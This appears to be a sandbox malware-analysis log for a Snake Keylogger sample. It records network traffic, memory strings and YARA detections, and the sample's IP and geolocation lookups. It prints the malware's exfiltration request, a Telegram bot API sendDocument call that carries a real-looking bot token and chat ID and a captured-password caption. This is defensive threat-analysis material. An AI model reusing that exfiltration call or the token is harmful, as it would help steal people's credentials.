Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49713 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcac7a674eafb1Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive

Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000302B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000284F000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002924000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000289E000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: rPO0977-6745.exe, 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgh
Source: rPO0977-6745.exe, 0000000A.00000002.3699929015.0000000006720000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003000000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002873000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: rPO0977-6745.exe, 00000000.00000002.1265411156.0000000003191000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 0000000B.00000002.1306085363.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rPO0977-6745.exe, EDyxAgkldisLe.exe.0.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535
Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000302B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000289E000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: rPO0977-6745.exe, 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000302B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000289E000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49741 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
